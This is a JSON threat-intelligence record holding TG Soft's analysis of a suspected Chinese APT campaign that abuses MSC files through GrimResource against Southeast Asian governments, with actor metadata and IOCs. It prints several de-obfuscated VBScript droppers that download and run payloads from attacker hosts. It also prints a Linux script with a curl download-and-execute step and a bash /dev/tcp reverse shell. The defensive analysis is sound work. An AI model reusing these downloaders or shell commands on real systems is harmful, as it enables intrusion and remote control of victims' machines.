{
	"id": "cede49a0-3ff9-43a7-bf94-11735f7594e6",
	"created_at": "2026-04-06T00:11:33.231593Z",
	"updated_at": "2026-04-10T03:37:40.643237Z",
	"deleted_at": null,
	"sha1_hash": "e118eb30b00875b6add60fa0a135488113bfc367",
	"title": "Chinese APT abuses MSC files with GrimResource vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4572023,
	"plain_text": "Chinese APT abuses MSC files with GrimResource vulnerability\nBy TG Soft S.r.l. - https://www.tgsoft.it\nArchived: 2026-04-05 13:04:23 UTC\nOver the past few months, TG Soft's C.R.A.M. has been monitoring different threat actors abusing MSC files.\nThe first APT group to use .MSC files in their attacks was #Kimsuky in April 2024, as reported by the company Genians. In May 2024, the use of this technique was also observed by the APT group known as #MustangPanda, which delivers the #PlugX malware, as reported by NTT.\nIn June 2024, the abuse of .MSC files was detected with the vulnerability called #GrimResource, as reported by Elastic.\nTG Soft's C.R.A.M. continued to monitor the situation in the following months, identifying new malware campaigns carried out by an unknown cyber actor, most likely of Chinese origin, targeting Southeast Asia.\nBelow is the timeline of the monitored attacks:\nThe first campaign we analyzed is that of August 2, 2024.\n[upd 2024-08-26 -> The timeline has been updated: the campaign identified on 2024/08/23 was delivered on 2024/08/19]\n[upd 2024-09-16 -> The timeline has been updated: added the campaign of 2024/09/14]\nCampaign Analysis\nCampaign of August 2, 2024\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\nPage 1 of 26\nOn August 2, 2024, an email campaign was released with the following file attached: 水域污染詳細訊息.msc\nTranslating the file name from Chinese to English, the document refers to: Detailed information on water pollution.msc\nThe image of the infection chain is shown in the figure:\nThe MSC file, via the vulnerability known as GrimResource, automatically executes the following script:\nDecrypting it gives the following more readable script:\nOption Explicit\nDim objShell, objFSO, objHTTP\nDim strURL1, strURL2, strURL3, strShowfileURL\nDim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath\nDim strExecutablePath\nstrURL1 = \"https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe\"\nstrURL2 = \"https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe.config\"\nstrURL3 = \"https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/water.txt\"\nstrShowfileURL = \"https[:]//wordpresss-data[.]s3.me-south-1[.]amazonaws[.]com/ws.pdf\"\nstrDownloadPath1 = \"C:\\Users\\Public\\oncesvc.exe\"\nstrDownloadPath2 = \"C:\\Users\\Public\\oncesvc.exe.config\"\nstrDownloadPath3 = \"C:\\Users\\Public\\water.txt\"\nstrShowfilePath = \"C:\\Users\\Public\\wrasb.pdf\"\nstrExecutablePath = \"C:\\Users\\Public\\oncesvc.exe\"\nSet objShell = CreateObject(\"WScript.Shell\")\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\nSet objHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nIf Not objFSO.FileExists(strDownloadPath1) Then\n    DownloadFile strURL1, strDownloadPath1\nEnd If\nIf Not objFSO.FileExists(strDownloadPath2) Then\n    DownloadFile strURL2, strDownloadPath2\nEnd If\nIf Not objFSO.FileExists(strDownloadPath3) Then\n    DownloadFile strURL3, strDownloadPath3\nEnd If\nIf Not objFSO.FileExists(strShowfilePath) Then\n    DownloadFile strShowfileURL, strShowfilePath\nEnd If\nobjShell.Run strExecutablePath, 1, True\nobjShell.Run strShowfilePath, 1, True\nSub DownloadFile(url, path)\n    Dim objStream\n    Set objStream = CreateObject(\"ADODB.Stream\")\n    objHTTP.Open \"GET\", url, False\n    objHTTP.Send\n    If objHTTP.Status = 200 Then\n        objStream.Open\n        objStream.Type = 1 ' adTypeBinary\n        objStream.Write objHTTP.ResponseBody\n        objStream.SaveToFile path, 2 ' adSaveCreateOverWrite\n        objStream.Close\n    End If\n    Set objStream = Nothing\nEnd Sub\nThe script downloads the following files into the C:\\Users\\Public folder:\noncesvc.exe (legitimate Microsoft \"ClickOnce\" file)\noncesvc.exe.config (configuration file used to load the malicious DLL)\nwater.txt (unused file, probably used to track infections)\nws.pdf (decoy)\nBelow we see the images of the decoy PDF file:\nThe oncesvc.exe.config file contains the following configuration:\nwhich allows the malicious DLL to be loaded from the address https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111985.jpeg through the AppDomain Manager Injection technique.\nThe malicious DLL executed by the ONCESVC.EXE process downloads from the site https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111522.jpeg a completely diskless 64-bit shellcode.\nIn the figure we can see the decryption of the AES-obfuscated URL and the execution of the downloaded shellcode in a thread:\nThe shellcode uses a custom DJB2 algorithm to compute the hashes of the names of the APIs it uses, as we see in the figure:\nThe 64-bit shellcode connects to the domain status[.]s3cloud-azure[.]com on port 8080 at the page:\n/common/oauth2/authorize?client_id=<client ID>\nby sending the following request via POST: {\"user\":\"password\"}\nThe following information is sent base64-encoded in the client_id field:\nusername, with an indication of whether it is Administrator (isAdmin)\nPC name\nprocess name\nindication of the operating system architecture (32 or 64 bit)\nsystem memory\nThen the shellcode calls the following page: /api/v1/homepage/<id>\nIf the response obtained is different from:\nNULL\n404 Not Found!\nthen a new shellcode is executed, as we see in the figure:\nDuring the analysis the shellcode downloaded and executed a third stage containing the Marte Beacon with Cobalt Strike, which connected to the site static[.]trendmicrotech[.]com on port 8443 (IPv6: 2a06:98c1:3120:0:0:0:0:7) at the pages:\nGET /etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts.\nPOST /OneCollector/1.0\nThis version of Cobalt Strike created the following pipe: \\\\.\\pipe\\srvsvc-1-5-5-067b62\nThe August 2 campaign targeted the Taiwan government, as reported by StrikeReady_Labs.\nCampaign of July 16, 2024\nOn July 16, 2024, the file Cert.msc was uploaded to VirusTotal from Vietnam.\nIt is assumed that this is the first campaign in which the threat actor exploited the GrimResource technique.\nThe MSC file contains an obfuscated script from which the following is obtained:\nOption Explicit\nDim objShell, objFSO, objHTTP\nDim strURL1, strURL2\nDim strDownloadPath1, strDownloadPath2\nDim strExecutablePath\nstrURL1 = \"https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe\"\nstrURL2 = \"https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config\"\nstrDownloadPath1 = \"C:\\Users\\Public\\Music\\Cert.exe\"\nstrDownloadPath2 = \"C:\\Users\\Public\\Music\\Cert.exe.config\"\nstrExecutablePath = \"C:\\Users\\Public\\Music\\Cert.exe\"\nSet objShell = CreateObject(\"WScript.Shell\")\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\nSet objHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nIf Not objFSO.FileExists(strDownloadPath1) Then\n    DownloadFile strURL1, strDownloadPath1\nEnd If\nIf Not objFSO.FileExists(strDownloadPath2) Then\n    DownloadFile strURL2, strDownloadPath2\nEnd If\nobjShell.Run strExecutablePath, 1, True\nSub DownloadFile(url, path)\n    Dim objStream\n    Set objStream = CreateObject(\"ADODB.Stream\")\n    objHTTP.Open \"GET\", url, False\n    objHTTP.Send\n    If objHTTP.Status = 200 Then\n        objStream.Open\n        objStream.Type = 1 ' adTypeBinary\n        objStream.Write objHTTP.ResponseBody\n        objStream.SaveToFile path, 2 ' adSaveCreateOverWrite\n        objStream.Close\n    End If\n    Set objStream = Nothing\nEnd Sub\nThe script inside the MSC file downloads the following files:\nhttps[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config\nhttps[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe\nhttps[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/ServiceHub.json\nhttps[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/205fcab1ea04882.jpg\nThe following files were not available during the analysis:\nCert.exe\nServiceHub.json\nThe Cert.exe file should have been the ServiceHub.Host.netfx.x64.exe program.\nThe Cert.exe.config file contains the following configuration:\nIt is assumed that the ServiceHub.json file is the malicious DLL loaded through the AppDomain Manager Injection technique, while the 205fcab1ea04882.jpg file directly contains the Marte Beacon with Cobalt Strike, which connected to the site us2[.]s3bucket-azure[.]online (IPv6: 2a06:98c1:3120:0:0:0:0:7) at the page \"/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts\".\nThe July 16, 2024 campaign did not use the 64-bit shellcode seen in the August 2 campaign, but instead directly executed the Marte Beacon with Cobalt Strike, as shown in the figure:\nCampaign of August 12, 2024\nOn August 12, 2024, the file Document_new.pdf.msc was uploaded to VirusTotal from Vietnam.\nThe MSC file contains an obfuscated script from which the following is obtained:\nOption Explicit\nDim objShell, objFSO, objHTTP\nDim strURL1, strURL2, strURL3, strShowfileURL\nDim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath\nDim strExecutablePath\nstrURL1 = \"https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.json\"\nstrURL2 = \"https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.config\"\nstrURL3 = \"https[:]//yitoo[.]oss-cn-hongkong[.]aliyuncs[.]com/calc.exe\"\nstrShowfileURL = \"https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Document_new.pdf\"\nstrDownloadPath1 = \"C:\\Windows\\Temp\\Service.exe\"\nstrDownloadPath2 = \"C:\\Windows\\Temp\\Service.exe.config\"\nstrDownloadPath3 = \"C:\\Users\\Public\\win.ini\"\nstrShowfilePath = \"C:\\Users\\Public\\Documents\\Documents.pdf\"\nstrExecutablePath = \"C:\\Windows\\Temp\\Service.exe\"\nSet objShell = CreateObject(\"WScript.Shell\")\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\nSet objHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nIf Not objFSO.FileExists(strDownloadPath1) Then\n    DownloadFile strURL1, strDownloadPath1\nEnd If\nIf Not objFSO.FileExists(strDownloadPath2) Then\n    DownloadFile strURL2, strDownloadPath2\nEnd If\nIf Not objFSO.FileExists(strDownloadPath3) Then\n    DownloadFile strURL3, strDownloadPath3\nEnd If\nIf Not objFSO.FileExists(strShowfilePath) Then\n    DownloadFile strShowfileURL, strShowfilePath\nEnd If\nobjShell.Run strExecutablePath, 1, False\nobjShell.Run strShowfilePath, 1, False\nSub DownloadFile(url, path)\n    Dim objStream\n    Set objStream = CreateObject(\"ADODB.Stream\")\n    objHTTP.Open \"GET\", url, False\n    objHTTP.Send\n    If objHTTP.Status = 200 Then\n        objStream.Open\n        objStream.Type = 1 ' adTypeBinary\n        objStream.Write objHTTP.ResponseBody\n        objStream.SaveToFile path, 2 ' adSaveCreateOverWrite\n        objStream.Close\n    End If\n    Set objStream = Nothing\nEnd Sub\nThe only component we had access to was the calc.exe file, which was stored inside the Public folder under the name win.ini.\nDuring the analysis, it was not possible to recover most of the files used in the attack.\nCampaign of August 15, 2024\nOn August 15, 2024, the file readme(解压密码).msc was uploaded to VirusTotal.\nThe MSC file contains an obfuscated script from which the following output is obtained:\nOption Explicit\nDim objShell, objFSO, objHTTP\nDim strURL1, strURL2, strURL3, strShowfileURL\nDim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath\nDim strExecutablePath\nstrURL1 = \"https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe\"\nstrURL2 = \"https[:]//bjj-files-production[.]s3[.]sa-east-1[.]amazonaws[.]com/msedge.dll\"\nstrURL3 = \"https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe.config\"\nstrShowfileURL = \"https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/readme.docx\"\nstrDownloadPath1 = \"C:\\Users\\Public\\oncesvc.exe\"\nstrDownloadPath2 = \"C:\\Users\\Public\\msedge.dll\"\nstrDownloadPath3 = \"C:\\Users\\Public\\oncesvc.exe.config\"\nstrShowfilePath = \"C:\\Users\\Public\\readme.docx\"\nstrExecutablePath = \"C:\\Users\\Public\\oncesvc.exe\"\nSet objShell = CreateObject(\"WScript.Shell\")\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\nSet objHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nIf Not objFSO.FileExists(strDownloadPath1) Then\n    DownloadFile strURL1, strDownloadPath1\nEnd If\nIf Not objFSO.FileExists(strDownloadPath2) Then\n    DownloadFile strURL2, strDownloadPath2\nEnd If\nIf Not objFSO.FileExists(strDownloadPath3) Then\n    DownloadFile strURL3, strDownloadPath3\nEnd If\nIf Not objFSO.FileExists(strShowfilePath) Then\n    DownloadFile strShowfileURL, strShowfilePath\nEnd If\nobjShell.Run strExecutablePath, 1, True\nobjShell.Run strShowfilePath, 1, True\nSub DownloadFile(url, path)\n    Dim objStream\n    Set objStream = CreateObject(\"ADODB.Stream\")\n    objHTTP.Open \"GET\", url, False\n    objHTTP.Send\n    If objHTTP.Status = 200 Then\n        objStream.Open\n        objStream.Type = 1 ' adTypeBinary\n        objStream.Write objHTTP.ResponseBody\n        objStream.SaveToFile path, 2 ' adSaveCreateOverWrite\n        objStream.Close\n    End If\n    Set objStream = Nothing\nEnd Sub\nThis campaign is similar to the one of August 2, where the oncesvc.exe file is used to load the malicious DLL downloaded from: https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json.\nThe malicious DLL downloads a 64-bit shellcode from https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/2472dca8c48ab987e632e66caabf86502bf3.xml.\nThe 64-bit shellcode is similar to the one seen on August 2; the command and control server in this case is api[.]s2cloud-amazon[.]com.\nThe POST body used in this case is {\"user\":\"password1\"}, slightly different from the August 2 campaign.\nAgain the shellcode downloaded the Marte Beacon with Cobalt Strike, which turned out to be the same version seen in the August 2 campaign.\nCampaign of August 20, 2024\nOn August 20, 2024, the file \"Hướng dẫn và yêu cầu kiểm tra, giám sát hoạt động của từng đơn vị năm 2024.msc\" was uploaded to VirusTotal.\nThe campaign targets Vietnam; translating the file name from Vietnamese gives \"Instructions and requirements for inspection and supervision of the activities of each unit in 2024.msc\".\nThe MSC file is similar to those seen in previous campaigns, with the ONCESVC.EXE file replaced by MUSICV.EXE.\nThe configuration file is the same as seen in the August 15 campaign; the same 64-bit shellcode is downloaded, followed by the same Marte Beacon with Cobalt Strike.\nThe decoy displayed, on the theme \"Vietnam Oil and Gas\", is interesting:\nCampaign of August 19, 2024\nOn August 23, 2024, the file \"贵州电视台张青副台长腐败内部视频证据.msc\" was uploaded to VirusTotal.\nThe campaign may be targeting France and was delivered on August 19, 2024; the file name translated from Chinese is \"Internal Video Evidence of Corruption of Deputy Director Zhang Qing of Guizhou TV Station.msc\".\nThe MSC file is similar to the one seen in the previous campaign of August 20, where the MUSICV.EXE program is used.\nDuring the analysis, it was not possible to download the malicious DLL from the link https://speedshare.oss-cn-hongkong.aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json. The link is the same as in the campaign of August 20.\nThe MSC file contains an obfuscated script from which the following output is obtained:\nOption Explicit\nDim objShell, objFSO, objHTTP\nDim strURL1, strURL2, strURL3, strShowfileURL\nDim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath\nDim strExecutablePath\nstrURL1 = \"https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe\"\nstrURL2 = \"https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe.config\"\nstrURL3 = \"https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.txt\"\nstrShowfileURL = \"http[:]//152[.]42[.]226[.]161/stime/1x.mp4\"\nstrDownloadPath1 = \"C:\\Users\\Public\\Music\\musicx.exe\"\nstrDownloadPath2 = \"C:\\Users\\Public\\Music\\musicx.exe.config\"\nstrDownloadPath3 = \"C:\\Users\\Public\\Music\\music.txt\"\nstrShowfilePath = \"C:\\Users\\Public\\proton.mp4\"\nstrExecutablePath = \"C:\\Users\\Public\\Music\\musicx.exe\"\nSet objShell = CreateObject(\"WScript.Shell\")\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\nSet objHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nIf Not objFSO.FileExists(strDownloadPath1) Then\n    DownloadFile strURL1, strDownloadPath1\nEnd If\nIf Not objFSO.FileExists(strDownloadPath2) Then\n    DownloadFile strURL2, strDownloadPath2\nEnd If\nIf Not objFSO.FileExists(strDownloadPath3) Then\n    DownloadFile strURL3, strDownloadPath3\nEnd If\nIf Not objFSO.FileExists(strShowfilePath) Then\n    DownloadFile strShowfileURL, strShowfilePath\nEnd If\nobjShell.Run strExecutablePath, 1, False\nobjShell.Run strShowfilePath, 1, False\nSub DownloadFile(url, path)\n    Dim objStream\n    Set objStream = CreateObject(\"ADODB.Stream\")\n    objHTTP.Open \"GET\", url, False\n    objHTTP.Send\n    If objHTTP.Status = 200 Then\n        objStream.Open\n        objStream.Type = 1 ' adTypeBinary\n        objStream.Write objHTTP.ResponseBody\n        objStream.SaveToFile path, 2 ' adSaveCreateOverWrite\n        objStream.Close\n    End If\n    Set objStream = Nothing\nEnd Sub\nBelow we see some screenshots of the decoy video downloaded from http://152.42.226[.]161/stime/1x.mp4\nInside the ZIP file sent via email containing the file 贵州电视台张青副台长腐败内部视频证据.msc, the file 贵州电视台内部领导张青副台长腐败内幕.docx is also present, which we see below:\nOther campaigns in April and May 2024\nThe analysis of the third stage of the Marte Beacon with Cobalt Strike has allowed us to associate the threat actor with three other campaigns launched between April and May:\n27 April 2024 (Philippines)\n7 May 2024 (Philippines)\n17 May 2024 (Vietnam)\nThese campaigns did not abuse MSC files for their distribution.\nThe Marte Beacon with Cobalt Strike could be located at the following URL:\nhttp://43.199.33[.]246:443/payload.bin\nAnalyzing the IP 43.199.33[.]246, the April 27 campaign was detected through the executable file named x1ffjiqd.exe, which downloaded and executed the following files:\nhttp://43.199.33[.]246:443/payload.bin\nhttp://43.199.33[.]246:443/example.pdf\nThe payload.bin file is the Marte Beacon with Cobalt Strike, with C&C server visualstudio-microsoft[.]com and port 443.\nThe following decoy was used in the April 27 campaign:\nThe following decoy was used in the May 7 campaign:\nIn the May 17 campaign the following decoy was used, with the name example.docx:\nThe IP address 43.199.33[.]246 is also associated with an ELF file (Linux) that downloads a backdoor, as we can see from the code snippet below:\nwhoami > /tmp/test\ncurl -o /tmp/google_usb_ssh -s https[:]//xianggang000[.]oss-cn-hongkong[.]aliyuncs[.]com/linshi/grrond\nchmod 777 /tmp/google_usb_ssh\n/tmp/google_usb_ssh\nrm /tmp/google_usb_ssh\nbash -i >& /dev/tcp/43[.]199[.]33[.]246/4433 0>&1\nwget https[:]//download[.]chrorne[.]com/error.logs\ngedit error.logs /dev/null -c /bin/sh\nThe cybercriminal probably needed to hit a target with a Linux OS. This bash script is similar in behavior to the VisualBasic script used inside MSC files for Windows. In this case the decoy is the display of an email message contained in the \"error.logs\" file.\nConclusions\nThe campaigns appear to primarily target government agencies and critical infrastructure in Southeast Asia, with particular focus on the following countries: Philippines, Vietnam, and Taiwan.\nFrom August 2 onwards, the threat actor inserted a new module into its infection chain containing a 64-bit shellcode, which then leads to the execution of a third stage with the Marte and Cobalt Strike beacons.\nThe modus operandi of the cyber actor reflects the techniques of APTs of Chinese origin; it has been noted that the group is operational from Monday to Friday, in hours compatible with Chinese working hours.\nAlthough it was not possible to make a precise attribution, it could be a subgroup of APT41.\nIOC\nfb640cfb9a86b9dc6806b048c6a88ef6ff546ca830a147322b4e3a3646b70942\neaae358c15ea26a976804a398c3fc2c25b37db0c89f09307e33cfc9ebcfba1d0\nebebe25dc22fecceb27c390ce77059ade8188be71e340a1e7b098cb3b73ba855\n4edc77c3586ccc255460f047bd337b2d09e2339e3b0b0c92d68cddedf2ac1e54\n04b336c3bcfe027436f36dfc73a173c37c66288c7160651b11561b39ce2cd25e\nc78a02fa928ed8f83bda56d4b269152074f512c2cb73d59b2029bfc50ac2b8bc\n4887fdb5bd5a59fa1754415dd818d455567cf6fe65fbeb7fbdbbe5b018bc3713\n633f5b27245a92b38d114aef292a485650bda737785d8a186b43cba8dc3969ca\n1c13e6b1f57de9aa10441f63f076b7b6bd6e73d180e70e6148b3e551260e31ee\ne7c58c2e315be01bd3a279c134e471ccf28046f67604b901279594dc5269a0f1\nca05513c365c60a8fdabd9e21938796822ecda03909b3ee5f12eb82fefa34d84\nf1d519f43c36e24a89b351f00059a1bdb9afc2a339f7301117babb484e2cc555\n159d13989d0ae44fddb7b1d4c331f1040d187693f16daa138c651f2cc9b7f6d3\na0d662b1765301f38b17b861893d282005d821139524d583ec0cd4ccfc5cd43c\n8542ee752ef2ee498e106c0a6ddc4a9810320d14fd85a857520b19d02db46903\n1e6c661d6981c0fa56c011c29536e57d21545fd11205eddf9218269ddf53d448\n257fa5c998d2117cc38452e6cbd2bf17b507c98ee492b246de6dcbc784585263\n6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n59171a541712e089dffee2336ec908aec856a38c4b7fbd74cc7a32fb698bc03e\n333ed1e77dd0ae502dd73ea029957cb015e770cabad3e090ab3db659769f86af\n9228d8ad3acec40e5d328f2b3ef4107fbe49107a85eb850c900b516520a1cb20\na725be0997035e10e059f8f3141a12f836aaca13e364cfa588ea548ec38d9498\nstatus[.]s3cloud-azure[.]com\nstatic[.]trendmicrotech[.]com:8443\napi[.]s2cloud-amazon[.]com:8080\nus2[.]s3bucket-azure[.]online:443\nvisualstudio-microsoft[.]com:443\n43[.]199[.]33[.]246:443\nAuthors: Ing. Gianfranco Tonello, Michele Zuin\nAny information published on our site may be used and published on other websites, blogs, forums, Facebook and/or in any other form, both in paper and electronic form, as long as the source is always and in any case cited explicitly as “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and/or web page from which textual content, ideas and/or images have been extrapolated.\nIn case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in summary articles, the following acknowledgment will be appreciated: “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”\nSource: https://www.tgsoft.it/news/news_archivio.asp?id=1568",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.tgsoft.it/news/news_archivio.asp?id=1568"
	],
	"report_names": [
		"news_archivio.asp?id=1568"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434293,
	"ts_updated_at": 1775792260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
